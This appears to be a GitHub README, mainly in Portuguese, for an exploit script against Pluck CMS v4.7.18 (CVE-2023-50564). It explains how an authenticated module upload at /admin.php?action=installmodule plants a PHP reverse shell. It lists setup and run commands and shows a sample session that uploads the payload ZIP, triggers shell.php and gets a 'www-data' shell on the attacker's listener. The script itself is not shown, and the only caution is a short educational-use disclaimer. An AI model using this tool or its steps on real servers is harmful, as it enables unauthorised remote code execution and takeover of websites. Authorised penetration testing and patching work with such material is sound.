
This script exploits the file upload feature in Pluck CMS v4.7.18 to upload a malicious PHP file, enabling remote access via a reverse shell. Once uploaded, this backdoor grants the attacker server access with web server permissions, allowing further actions within the system or network.
Este script explora uma vulnerabilidade de upload arbitrário de arquivo autenticado no Pluck CMS v4.7.18 (CVE-2023-50564). Aproveitando essa vulnerabilidade, um atacante autenticado pode enviar um arquivo PHP malicioso, permitindo a execução de código arbitrário (neste caso, um reverse shell).
A vulnerabilidade existe no endpoint /admin.php?action=installmodule, que permite que um usuário autenticado envie um arquivo ZIP contendo arquivos arbitrários. Ao enviar um arquivo PHP malicioso, este exploit estabelece um reverse shell de volta ao atacante.
pip install requestspip install requests-toolbeltEste script também requer um login válido para a instância do Pluck CMS, incluindo a URL alvo e a senha.
su, sudo -l) e permite que o usuário forneça entrada manualmente.git clone https://github.com/yourusername/Pluck-CMS-Exploit.git
cd Pluck-CMS-Exploit
pip install requests requests-toolbelt
Execute o exploit usando Python:
python3 exploit.py
Shell> para interagir com o sistema alvo.Exemplo:
$ python3 exploit.py
Enter the target URL (e.g., example.com): pluckcms.vulnerable.com
Enter the password for target authentication: password123
Enter your IP (for reverse shell): 10.10.14.5
Enter the port to listen on (for reverse shell): 4444
[*] Autenticando no alvo...
[+] Autenticação bem-sucedida.
[*] Gerando arquivo PHP do reverse shell...
[+] Arquivo PHP do reverse shell criado com sucesso como 'shell.php'.
[*] Criando payload ZIP...
[+] Arquivo ZIP criado como 'payload.zip'.
[*] Iniciando listener do reverse shell em 10.10.14.5:4444 ...
[*] Enviando payload para o alvo...
[+] Payload enviado com sucesso.
[*] Acionando reverse shell em: http://pluckcms.vulnerable.com/data/modules/payload/shell.php
[+] Conexão recebida de ('10.10.10.1', 55678)
Shell> whoami
www-data
Este script é destinado a fins educacionais e hacking ético. Ele deve ser usado apenas em ambientes onde você tenha permissão explícita para testar. O autor não é responsável por qualquer uso indevido desta ferramenta.
Este projeto está licenciado sob a Licença MIT - veja MIT License para detalhes.
Sinta-se à vontade para fazer um fork do repositório e enviar pull requests. Para quaisquer problemas ou solicitações de funcionalidades, por favor, abra uma issue no GitHub.